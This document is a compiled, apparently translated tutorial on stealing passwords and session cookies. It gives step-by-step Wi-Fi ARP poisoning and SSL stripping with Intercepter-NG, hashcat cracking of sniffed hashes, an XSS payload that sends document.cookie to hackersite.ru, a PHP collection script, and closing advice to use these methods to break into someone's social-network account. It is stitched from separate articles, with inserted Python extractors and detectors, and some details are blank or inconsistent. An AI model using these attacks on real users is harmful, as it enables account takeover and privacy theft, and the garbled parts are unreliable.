Methods of stealing cookies

Many users do not realize that the username and password they type when registering or logging in to a restricted site, and then submit with ENTER, can easily be intercepted. Very often these credentials cross the network unprotected. If the site you are logging in to uses plain HTTP, it is trivial to capture the traffic, open it in Wireshark, and use display filters and a cracking tool to find the password and recover it from whatever hash was sent.

The best place to intercept passwords is the network core, where every user's traffic to internal resources (for example, mail) passes, or just in front of the router that provides Internet access, for logins to external sites. Set up a mirror (SPAN) port and you are ready to play the attacker.

Step 1. Install and run Wireshark to capture traffic

Often it is enough to select the interface to capture on and click Start. In our case we capture on the wireless interface.

Traffic capture has begun.

Step 2. Filtering captured POST traffic

Open a browser and log in to some site with a username and password. Once the login completes and the page opens, stop the capture. The analyzer now shows a large number of packets; this is where many give up because they do not know what to look at. We are interested in the packets carrying POST data: the form fields your browser builds when you fill in the form and sends to the server when you click "Login" in the browser.

Enter a display filter in the packet list: http.request.method == "POST"

Instead of thousands of packets we now see only the one with the data we are after.

Step 3. Find the username and password

Right-click it and choose Follow TCP Stream from the menu.


A new window shows the reassembled text of the exchange. Look for the fields "password" and "user". Often both are readable in plain text, but on well-known sites such as Mail.ru, Facebook or Vkontakte the password is transformed before it is sent, as in the server response below, where the cookie carries a hash rather than the password itself:

HTTP/1.1 302 Found
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: password=; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
Location: loggedin.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Thus, in our case:

Username: networkguru

Password:

Step 4. Identifying the hash type before cracking the password

Go, for example, to http://www.onlinehashcrack.com/hash-identification.php#res and paste the captured value into the identification box. I was given a list of candidate hash algorithms in order of likelihood:

Step 5. Recovering the user's password

At this stage we can use hashcat: -m 0 selects the MD5 mode identified in the previous step, -a 0 is a straight dictionary attack, the first file holds the captured hash and the second is the wordlist:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

The output gives us the recovered password: simplepassword
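To make Steps 2 to 5 concrete, here is an added example (not part of the original article, and not a Wireshark or hashcat component) that does by hand what the tutorial does with the GUI and hashcat: it takes a reassembled TCP stream, applies the equivalent of the POST filter, pulls the username and password fields and the Set-Cookie header out of it, guesses the hash type from its length, and runs a dictionary attack. The stream, the field names and the wordlist are constructed for the example; the password is hashed client-side with MD5, which is what hashcat -m 0 assumes.

```python
import hashlib
import re
from urllib.parse import parse_qs

# Constructed stand-in for the text Wireshark shows under "Follow TCP Stream":
# the browser's POST (password sent as a client-side MD5, as the well-known
# sites above do) followed by the server's reply.
BODY = "user=networkguru&password=" + hashlib.md5(b"simplepassword").hexdigest()
STREAM = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: 192.168.1.50\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    "\r\n"
    + BODY +
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "Set-Cookie: password=" + hashlib.md5(b"simplepassword").hexdigest() + "; path=/\r\n"
    "Location: loggedin.php\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "letmein", "simplepassword", "dragon"]

USER_FIELDS = re.compile(r"user|login|email|name", re.I)
PASS_FIELDS = re.compile(r"pass|pwd", re.I)

# Hex-digest lengths of the common unsalted hashes; hashcat -m 0 is MD5.
HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}


def parse_message(raw):
    """Split one HTTP message off the stream: (start line, headers, body, remainder)."""
    head, _, rest = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    length = int(headers.get("content-length", ["0"])[0])
    return lines[0], headers, rest[:length], rest[length:]


def extract_credentials(stream):
    """Equivalent of filtering on http.request.method == "POST" and reading the form."""
    start, headers, body, rest = parse_message(stream)
    if not start.startswith("POST "):
        return None
    if "application/x-www-form-urlencoded" not in headers.get("content-type", [""])[0]:
        return None
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    username = next((v for k, v in fields.items() if USER_FIELDS.search(k)), None)
    password = next((v for k, v in fields.items() if PASS_FIELDS.search(k)), None)
    cookies = []
    if rest:                       # the server's reply follows in the same stream
        _, resp_headers, _, _ = parse_message(rest)
        cookies = resp_headers.get("set-cookie", [])
    return {"username": username, "password": password, "set_cookie": cookies}


def identify_hash(value):
    """Step 4 by hand: a hex string of a known digest length; None means plaintext."""
    if re.fullmatch(r"[0-9a-f]+", value or ""):
        return HASH_LENGTHS.get(len(value))
    return None


def dictionary_attack(digest, wordlist, algorithm):
    """Step 5 by hand: hashcat -a 0 in a few lines. Returns the word or None."""
    for word in wordlist:
        if hashlib.new(algorithm, word.encode()).hexdigest() == digest.lower():
            return word
    return None


if __name__ == "__main__":
    creds = extract_credentials(STREAM)
    algo = identify_hash(creds["password"])
    print(creds["username"], algo, dictionary_attack(creds["password"], WORDLIST, algo))
```

Length-based identification is only a guess (an unsalted SHA-256 and many other 64-hex-character values look identical); in practice you confirm the guess by cracking, as the tutorial does.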

Thus, Wireshark is useful not only for troubleshooting applications and services but also for seeing, as an attacker would, the passwords users type into web forms. Mail credentials can be pulled out with equally simple display filters:

  • POP3: pop.request.command == "USER" || pop.request.command == "PASS"
  • IMAP: imap.request contains "login"
  • SMTP: smtp.req.command == "AUTH"

POP3 and IMAP send the credentials in clear text; SMTP AUTH PLAIN and AUTH LOGIN only base64-encode them, so a decoder is enough. Only hashed values, as in the HTTP example above, call for hashcat or a similar tool.
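As an added example covering the three mail filters above (not code from the article), the following script decodes what those filters surface: POP3 USER/PASS, SMTP AUTH PLAIN and AUTH LOGIN with their base64 decoded inline, and an IMAP LOGIN command. The session transcripts are constructed and contain only the client-to-server lines.

```python
import base64
import re

# Constructed client-side command lines, i.e. what the display filters above show
# once the client-to-server direction of each mail session is followed.
POP3_SESSION = ["USER alice", "PASS s3cret", "STAT", "QUIT"]
SMTP_PLAIN_SESSION = ["EHLO laptop",
                      "AUTH PLAIN " + base64.b64encode(b"\0bob\0hunter2").decode(),
                      "MAIL FROM:<bob@example.test>"]
SMTP_LOGIN_SESSION = ["EHLO laptop", "AUTH LOGIN",
                      base64.b64encode(b"carol").decode(),       # reply to "334 VXNlcm5hbWU6"
                      base64.b64encode(b"passw0rd").decode(),    # reply to "334 UGFzc3dvcmQ6"
                      "QUIT"]
IMAP_SESSION = ['a001 LOGIN dave "p@ss word"', "a002 SELECT INBOX"]

IMAP_LOGIN = re.compile(r'^\S+\s+LOGIN\s+(?P<user>"[^"]*"|\S+)\s+(?P<pw>"[^"]*"|\S+)$', re.I)


def _b64(token):
    """Decode one base64 token, or None if it is not valid base64 text."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_mail_credentials(client_lines):
    """Return [(protocol, user, password), ...] found in the client's commands."""
    found = []
    pop_user = None       # POP3 sends USER, then PASS
    login_state = None    # SMTP AUTH LOGIN: None -> "user" -> "pass"
    login_user = None
    for raw in client_lines:
        line = raw.strip()
        upper = line.upper()

        if login_state is not None:             # bare base64 continuation lines
            decoded = _b64(line)
            if decoded is None:
                login_state = None              # client aborted or sent a command
                continue
            if login_state == "user":
                login_user, login_state = decoded, "pass"
            else:
                found.append(("smtp", login_user, decoded))
                login_state = None
            continue

        if upper.startswith("USER "):
            pop_user = line[5:]
        elif upper.startswith("PASS ") and pop_user is not None:
            found.append(("pop3", pop_user, line[5:]))
            pop_user = None
        elif upper.startswith("AUTH PLAIN "):
            decoded = _b64(line[11:])           # authzid \0 authcid \0 password
            if decoded is not None and decoded.count("\0") == 2:
                _authzid, user, password = decoded.split("\0")
                found.append(("smtp", user, password))
        elif upper == "AUTH LOGIN":
            login_state = "user"
        else:
            m = IMAP_LOGIN.match(line)
            if m:
                found.append(("imap", m.group("user").strip('"'), m.group("pw").strip('"')))
    return found


if __name__ == "__main__":
    for session in (POP3_SESSION, SMTP_PLAIN_SESSION, SMTP_LOGIN_SESSION, IMAP_SESSION):
        print(extract_mail_credentials(session))
```

None of this applies once the client negotiates STARTTLS or connects on the TLS ports (995, 993, 465): the commands are then inside the encrypted channel and the filters match nothing.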

Step 6. What if the traffic is encrypted with HTTPS?

There are two realistic options.

Option 1. Become an active man-in-the-middle: break the connection between the user and the server and terminate TLS yourself, so that each side completes its handshake with you (SSL MITM), or downgrade the client to plain HTTP (SSL Strip). A purely passive capture of the handshake does not give you the session key: with Diffie-Hellman key exchange the keys never cross the wire, and the browser warns about an untrusted certificate unless you control a CA it trusts.

Option 2. Decrypt the traffic with the session key log that Firefox or Chrome writes when the SSLKEYLOGFILE environment variable points to a file. The browser has to be configured to write these keys (the example here is based on Firefox) and you need that file. In practice this means taking the key log from another user's disk, which is illegal; then capture the traffic and use the logged keys to decrypt it.

Clarification. This is about the browser of the person doing the capture. If you want to decrypt your own HTTPS traffic to practise, this works. It does not work against other users' HTTPS traffic without access to their computers; that is exactly what the encryption is for.

Once you have keys from option 1 or 2, register them in Wireshark:

  1. Go to Edit - Preferences - Protocols - TLS (called SSL in older versions).
  2. Tick "Reassemble TLS records spanning multiple TCP segments".
  3. For a key log file, put its path in "(Pre)-Master-Secret log filename".
  4. For a server's RSA private key, open "RSA keys list", click Edit and fill in the fields, including the path to the key file. This only decrypts sessions that used RSA key exchange, not forward-secret (EC)DHE ones, which is why the key log is the usual route.

On the dangers of open Wi-Fi access points, and which passwords can be intercepted on them.

Today we will look at intercepting passwords and cookies over Wi-Fi using the Intercepter-NG program.

The attack relies on sniffing.

Sniffing (from "to sniff") means passively capturing and analyzing network traffic: which sites a user visits and, where they travel unprotected, what passwords they send. It is just as useful for legitimate purposes, for example spotting malware that sends data out to the Internet.


The method shown here is basic; the program can do a lot more.
Download it from the official site, sniff.su (copy the link and open it in a new tab), in the "Download" section.
There are versions for Windows, Unix-like systems and Android.
We will use Windows, as it is the most common system and the program is most developed there.
Your browser or antivirus may flag the program as dangerous; it is an attack tool, and security software reacts to such programs.
It comes as a zip archive: unpack it into a folder, nothing needs to be installed.
The program can run various MITM attacks on Wi-Fi networks.
This article is written purely for informational purposes, to show by example the danger of open Wi-Fi access points. Any of the actions described are performed at your own risk, and remember that accessing other people's data carries criminal liability.


Working with Intercepter NG

The program is launched via Intercepter-NG.exe.
The interface is in English, but a confident computer user will find their way around.

Below there is a video on the setup (for those who prefer watching to reading).
- Select the desired network adapter at the top if you have several.
- Switch the type between Ethernet and Wi-Fi: for Wi-Fi, select the Wi-Fi icon (to the left of the network selection).

- Press the Scan Mode button (radar icon).
- Right-click in the empty field and choose Smart scan from the context menu.
- All devices connected to the network are listed.
- Choose a victim (you can select several by holding Shift), but do not mark the router itself; its IP is usually 192.168.1.1.
- With the victim selected, right-click and choose Add to NAT.


- Go to the NAT tab.
- Under Stealth IP, change the last octet to any unused address; this hides your real IP.
- Tick SSL Strip and SSL MITM.


- Press Settings (the gear icon on the right).
- Tick Resurrection (the option that captures passwords and cookies from HTTPS sessions once SSL Strip or SSL MITM is in place) and Remove Spoof IP/MAC. You can also tick Cookie Killer: it throws the victim out of the page they are on, for example a social network, so they have to enter their password again and we capture it. Compare your settings with the picture. Note that HSTS and browser certificate warnings limit what SSL Strip and SSL MITM can achieve against modern sites.


- Close the settings with the checkmark; the configuration is done.
- You can now start the attack.
- Press Start/Stop Sniffing at the top (triangle icon), then, in the same window, the radiation icon below it, Start/Stop ARP Poison.
- Go to the Password Mode tab, right-click in the window and select Show Cookies (this shows the cookies and passwords entered by victims).
That is all; now we wait for someone to enter a password.
Sometimes the Internet stops working; try going online yourself, and if it does not work, restart the program.
I noticed that it is not always possible to intercept the password, but in practice it works almost without failure.
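The Start/Stop ARP Poison step above is what a defender on the same Wi-Fi can detect. The following added example (not part of the original article or of Intercepter-NG) runs a simple ARP-poisoning detector over a constructed list of ARP replies that reproduces the setup above: a router at 192.168.1.1 and an attacker whose NIC suddenly answers for both the router and the victim. Addresses and MACs are made up for the example.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"

# Constructed ARP "is-at" replies, as a passive sensor on the Wi-Fi would see
# them: (seconds, sender IP, sender MAC). The last two are what Start ARP Poison
# produces: the attacker's NIC claims the router's address towards the victim and
# the victim's address towards the router.
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # the real router
    (0.5, "192.168.1.20", "aa:bb:cc:00:00:20"),   # the victim
    (1.0, "192.168.1.77", "de:ad:be:ef:00:77"),   # the attacker's own address
    (2.0, "192.168.1.1",  "de:ad:be:ef:00:77"),   # "the router is at the attacker's MAC"
    (2.5, "192.168.1.20", "de:ad:be:ef:00:77"),   # "the victim is at the attacker's MAC"
]


def detect_arp_spoofing(replies, gateway_ip):
    """Return alerts for the two signatures of ARP poisoning: an IP-to-MAC binding
    that changes (worst when it is the gateway's) and one MAC claiming several IPs.
    The first binding seen for an IP is taken as the trusted one; on a real network
    seed it from a static table or DHCP leases instead of trusting the first packet."""
    binding = {}                 # ip -> trusted mac
    claims = defaultdict(set)    # mac -> ips it has claimed
    alerts = []
    for ts, ip, mac in replies:
        previous = binding.get(ip)
        if previous is not None and previous != mac:
            kind = "gateway-hijack" if ip == gateway_ip else "binding-change"
            alerts.append({"time": ts, "kind": kind, "ip": ip, "old": previous, "new": mac})
        binding.setdefault(ip, mac)
        claims[mac].add(ip)
        if len(claims[mac]) == 2:    # fires once, the first time a MAC claims a second IP
            alerts.append({"time": ts, "kind": "multi-ip-mac", "mac": mac,
                           "ips": sorted(claims[mac])})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, GATEWAY_IP):
        print(alert)
```

A MAC legitimately answering for two addresses (a multihomed host, a router with a secondary IP) also trips the second rule, so treat "multi-ip-mac" as a lead and the gateway binding change as the alarm; the Stealth IP setting in the tutorial is precisely an attempt to keep the attacker's own address out of this picture.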

That's all; we have covered intercepting passwords and cookies over Wi-Fi.

Take care of yourself.

How to steal cookies

Stealing cookies works well and is used by many attackers. If you want to understand how it is done but do not know where to start, read on.

What are cookies?

Cookies are small pieces of information a site stores in the visitor's browser, kept in the browser's cookie store. They typically hold a session identifier that proves to the site who you are, and sometimes preferences, e-mail addresses or other identifiers. Whoever obtains a valid session cookie can act as that user without knowing the password, which is why attackers want them and use several methods to get hold of them.

How to steal cookies

XSS vulnerability

XSS can be found on many sites. When an attacker finds one, he injects his own script into the page; the payload is written for the specific site and purpose. When a user loads the affected page, the script runs in the victim's browser, in the site's origin, and can collect whatever the browser holds for that site, such as its cookies.

Any injection point that gets the script into the page can be used: a bug in the web application, in the browser or on the user's system.

There are two types of XSS attack:

Reflected (the article calls it passive): the payload lives in the request, for example in a search box, a dialog tab or a video catalogue parameter that the page echoes back, so each victim has to be made to send it.

Stored (active): the payload is saved on the server and served to everyone who views the page. Forums, blogs and chats are typical places to find it.

How do I get a person to trigger the XSS?

It is not trivial, because a reflected payload usually requires the victim to open a link containing it. The link can be disguised and sent by e-mail with an attractive offer, say a big discount in an online store, or hidden behind an image; the user will likely open it without suspecting anything.

Sniffer installation

This means placing specialized software where it can see someone else's traffic. A sniffer captures the sessions carrying other people's data, so it yields logins, passwords, addresses and anything else the user sends across the network. Attacks of this kind mostly target unprotected HTTP, and unsecured Wi-Fi is a convenient place for them.

There are several ways to deploy a sniffer:

  • Copy the traffic (a mirror/SPAN port);
  • Redirect the traffic to yourself with attacks such as ARP spoofing;
  • Listen on an interface in promiscuous or monitor mode;
  • Insert the sniffer inline, as a tap in the link.
Cookies substitution

Cookies are stored in the browser, and the server normally accepts whatever values the browser presents. Replacing them with values taken from another user's browser is cookie substitution: load the stolen cookies on another computer and you get the user's session and everything it can reach. Cookies can be edited through browser settings or developer tools, add-ons, special programs, or, for browsers that keep them in plain files, an ordinary text editor.

Stealing cookies with a virus

Experts advise against relying on cookies unless there is a need for them, and disabling them where possible, because they are a frequent theft target and expose a lot of personal data that can be used against a person. The most dangerous are persistent cookies that remain on the system after the session has ended.

Cookies are often stolen with malware. The malware is bundled into an otherwise harmless-looking utility, reports to its operator's server, and either reads the browser's cookie store directly or configures the browser to use it as a proxy so that it sees the traffic.

Once on the victim's PC it automatically collects the stored data and sends it to the attacker.

Such malware differs in capability: some takes full control of the browser and can read any information, some steals protected material, and some only collects unprotected data.

Getting the program onto someone else's computer is the hard part: the user must be made to download and run it, whether through an e-mailed link or by passing it off as legitimate software on a site the victim visits.

How to protect cookies from theft?

Most web resources are not secure enough; attackers find vulnerabilities and bugs on them easily.

Cookie protection rules:

  1. Bind the session to the client's identity (device or address), so a cookie replayed from another device starts a new session instead of resuming the old one.
  2. Bind the session to the browser (for example its User-Agent); the same principle as in the previous point.
  3. Encrypt what is transmitted, i.e. serve the site over HTTPS and mark cookies Secure, so an intercepted copy is useless. This does not protect against script running in the user's browser or malware on the endpoint; against the former, the HttpOnly attribute keeps the cookie out of document.cookie.
  4. Keep session identifiers separate from other user data, so that a stolen identifier reveals nothing else.
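Rules 1 to 3 above, as an added example in Python (not the page's own code): a minimal server-side session store that binds each session to the client's User-Agent and address, issues the cookie with the Secure, HttpOnly and SameSite attributes, and destroys the session when the cookie is replayed from a different client. The session store, names and client values are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Server-side session store: session id -> record. In production this is a
# database or cache; a dict is enough to show the checks.
SESSIONS = {}


def fingerprint(user_agent, client_ip):
    """Rules 1 and 2: a digest of the client attributes the session is bound to."""
    return hashlib.sha256(f"{user_agent}\n{client_ip}".encode()).hexdigest()


def create_session(user, user_agent, client_ip):
    """Issue an unguessable session id and remember who it belongs to."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "fp": fingerprint(user_agent, client_ip)}
    return sid


def session_set_cookie(sid):
    """Rule 3 and its caveat, expressed as cookie attributes:
    Secure   - never sent over plain HTTP, so a Wi-Fi sniffer sees nothing;
    HttpOnly - invisible to document.cookie, so an XSS payload cannot exfiltrate it;
    SameSite - not attached to cross-site requests;
    Max-Age  - a short lifetime limits the window for a stolen copy."""
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=3600"


def parse_cookie_header(header):
    """Cookie: a=b; c=d  ->  {"a": "b", "c": "d"}"""
    pairs = (part.strip().split("=", 1) for part in header.split(";") if "=" in part)
    return {name.strip(): value for name, value in pairs}


def lookup_session(cookie_header, user_agent, client_ip):
    """Resolve the cookie to a user, or None. A mismatch in the bound attributes
    means the cookie was replayed from elsewhere: the session is destroyed so the
    legitimate holder also has to log in again (rule 1: a new session starts)."""
    sid = parse_cookie_header(cookie_header).get("session")
    record = SESSIONS.get(sid)
    if record is None:
        return None
    if not hmac.compare_digest(record["fp"], fingerprint(user_agent, client_ip)):
        del SESSIONS[sid]
        return None
    return record["user"]


if __name__ == "__main__":
    ua = "Mozilla/5.0 (X11; Linux)"
    sid = create_session("networkguru", ua, "192.168.1.20")
    print(session_set_cookie(sid))
    print(lookup_session(f"session={sid}", ua, "192.168.1.20"))     # networkguru
    print(lookup_session(f"session={sid}", ua, "192.168.1.77"))     # None, session destroyed
```

Address binding breaks for users whose IP changes (mobile networks, corporate NAT), and the User-Agent is under the attacker's control once he holds the cookie, so the binding is a speed bump rather than a wall; the attributes on the Set-Cookie line, TLS and a short lifetime are what actually defeat the sniffing and XSS attacks described on this page.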

How to find out the password from someone else's account through cookies?

To use someone else's saved credentials you first have to reach the place where the browser saved them; what follows concerns the browser's saved-password store rather than cookies.

In Mozilla Firefox open the Tools menu, then in the settings find the Security section, where the saved logins for social networks and other sites are listed. Passwords are hidden, so click Show. Here you can also set a master password so that nobody but you can see this information.

In Opera only usernames are shown by default, but the password manager in the menu lists everything stored on the computer. Access to the passwords themselves requires an additional extension.

In Google Chrome all this is under the advanced settings, where there is a tab with all the saved cookies.

Internet Explorer has no such built-in view. To see which sites the owner of the PC visits you need a third-party tool; free ones exist, but download them only from trusted sources and scan them with an antivirus first. This applies especially to utilities that handle passwords.

This technique only works with physical access to the victim's computer. You can also learn someone's password if they logged in to a site from your PC and saved their credentials.

Programs to steal cookies

There are many hacker forums where people go hoping for free help, and they are full of hacking programs. Do not trust them: utilities that claim to steal cookies remotely from someone else's device are either dummies or malware, and downloading them makes you the scammer's victim; that is how they spread malware and take control of other people's PCs. You can usually tell from the interface and content. If you want software for extracting such files, use a sniffer. They are not easy to use, and a good one is not easy to find; there are people who sell them, and plenty of scammers among them, so deal only with sellers who have a reputation, reviews and a site of their own.

In conclusion, stealing cookies is a powerful and effective technique. If you are trying to get into someone's social network or messenger profile, it is an option to consider. It works best when you have access to the victim's computer; obtaining cookies remotely is much harder, but the advice above can be applied in practice.


Have you noticed that when you return to a site you visited before, it recognizes you and opens with the settings you applied last time? That is cookies at work: they store data about the visitor such as a login, session ID and other variables the site needs to identify you and render the page according to the preferences you chose on your last visit. The WebCookiesSniffer program shows the cookies, and their contents, of the sites you view in the browser.

Viewing Cookies

Open a site and WebCookiesSniffer captures its cookies in real time. The utility adds every captured cookie to a table with the host, the request path, the total cookie length, the number of variables and the cookie itself with variable names and values. The collected information can be saved to a text file, and an HTML report can be generated for all or selected cookies. The program needs the WinPcap driver (included in the archive). To switch the interface to Russian, copy WebCookiesSniffer_lng.ini (also in the archive) into the program's directory.

Screenshots of WebCookiesSniffer



What is a cookie?

There is a mechanism that lets an HTTP server store a small piece of text in the browser and read it back later. This is a cookie. Each cookie is a name-value pair and is assigned the domain it belongs to; for security, every browser only returns a cookie to the domain that set it. A cookie may also carry an expiry date, in which case it stays on the computer until then even if all browser windows are closed.


Why are cookies important?

In any multi-user system cookies identify the user, or rather the user's current session with the service. Anyone who learns your session cookie can log in as you, because at present very few sites check whether the IP address changes within a session.


How do I change or replace a cookie?

Browsers of the time had no built-in cookie editor (modern browsers expose cookies in their developer tools), but a plain text editor is enough for the method below, which uses an Internet Explorer context-menu extension.


Step 1: create a text file with the following content. The key is Internet Explorer's MenuExt key; its last component is the text of the context-menu entry used in Step 5, and its default value points at the HTML file created in Step 3.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Working with Cookies]
@="C:\\IE_ext.htm"

Save it under the name IE_ext.reg

Step 2: double-click the file to import the changes into the Windows registry.

Step 3: create a text file with the following content. The script runs with the page passed in external.menuArguments; it copies the current cookies to the clipboard, shows them, sets a test cookie, and shows the result.

<script language="javascript">
external.menuArguments.clipboardData.setData("Text", external.menuArguments.document.cookie);
alert(external.menuArguments.document.cookie);
external.menuArguments.document.cookie = "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);
</script>

Save it as C:\IE_ext.htm

Step 4: We go to the website of interest to us.

Step 5: right-click an empty area of the page and choose the menu item "Working with Cookies". Allow access to the clipboard. The clipboard now holds your cookies for this site; paste them into Notepad to see them.


Step 6: to change a cookie, edit C:\IE_ext.htm, replacing testname with the cookie's name, testvalue with its value and testdomain.ru with the site's domain. Add more such lines if needed. For easier control I added the output of the current cookies before and after the change to the script: alert(external.menuArguments.document.cookie);

Step 7: repeat Step 5, then refresh the page.

Result: we are on the site with the updated cookies.

How to steal a cookie using JavaScript?

If an attacker finds a way to execute arbitrary JavaScript in the victim's browser on the target site, reading the current cookies is trivial. Example:


var str = document.cookie;

But can he send them to his own site, given that, as noted earlier, a script cannot read a response from another domain without that domain's consent (the same-origin policy)? It turns out that a script can request any image from any HTTP server, and it can put arbitrary text into that request, for example http://hackersite.ru/xss.jpg?text_info. So if this code runs:

var img = new Image();
img.src = "http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);

then the cookies appear in the request for the "picture" and travel to the attacker.

How to handle such requests for a "picture"?

The attacker only needs hosting with PHP support and a script like this (log.txt must be writable by the web server):

<?php
$uid = urldecode($_SERVER["QUERY_STRING"]);
$fp = fopen("log.txt", "a");
fputs($fp, "$uid\n");
fclose($fp);
?>

The query string of every request to this script is then appended to log.txt. It only remains to replace http://hackersite.ru/xss.jpg in the JavaScript above with the path to this PHP script.
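The victim site's own logs never see the "picture" request, since it goes to the attacker's server, but an outbound web proxy does. As an added example (not code from the article), the following detector runs over constructed proxy log lines and flags requests whose query string decodes to cookie syntax, which is exactly what the Image() trick above produces: encodeURI leaves ';' and '=' untouched, so the query reads PHPSESSID=...;%20lang=..., and an encodeURIComponent variant decodes to the same thing. The log format, hostnames and cookie values are assumptions of the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Cookie names that identify a session on common platforms; one of them in a
# query string is a strong signal on its own.
SESSION_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "session", "sid"}

# Constructed outbound-proxy log lines: epoch, client, method, URL. Lines 2 and 4
# are what the Image() trick produces with encodeURI and encodeURIComponent.
PROXY_LOG = [
    "1699999001 10.0.0.5 GET http://cdn.example.test/logo.png?v=42",
    "1699999002 10.0.0.5 GET http://hackersite.ru/xss.jpg?PHPSESSID=4f3c9a1e;%20lang=ru",
    "1699999003 10.0.0.7 GET http://news.example.test/?utm_source=mail&utm_medium=email",
    "1699999004 10.0.0.7 GET http://evil.example.test/px.gif?JSESSIONID%3DA1B2C3%3B%20theme%3Ddark",
    "1699999005 10.0.0.9 GET http://shop.example.test/item?id=77",
]

LINE = re.compile(r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def cookie_pairs_in_query(url):
    """Return the cookie names if the query string looks like a serialized
    document.cookie ('a=b; c=d'), else an empty list."""
    query = unquote(urlsplit(url).query)
    if not query:
        return []
    pairs = [p.strip() for p in query.split(";")]
    if not all("=" in p for p in pairs):
        return []
    names = [p.split("=", 1)[0].strip() for p in pairs]
    if any(n.lower() in SESSION_NAMES for n in names):
        return names            # a session id name: flag even a single pair
    if len(pairs) >= 2 and "&" not in query:
        return names            # several ';'-separated pairs is cookie syntax, not a form
    return []


def detect_cookie_exfil(log_lines):
    """Flag outbound requests whose query string carries cookie material."""
    hits = []
    for line in log_lines:
        m = LINE.match(line)
        if not m:
            continue
        names = cookie_pairs_in_query(m.group("url"))
        if names:
            hits.append({"client": m.group("client"),
                         "host": urlsplit(m.group("url")).hostname,
                         "cookies": names})
    return hits


if __name__ == "__main__":
    for hit in detect_cookie_exfil(PROXY_LOG):
        print(hit)
```

A payload that base64-encodes or otherwise obfuscates document.cookie before appending it slips past this check, so the detector is a cheap first filter; the reliable fix is on the server side, where an HttpOnly cookie never reaches document.cookie in the first place.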


Outcome

I have shown only the simplest way to exploit an XSS vulnerability, but it proves that a single such vulnerability on a multi-user site lets an attacker use the site's resources on your behalf.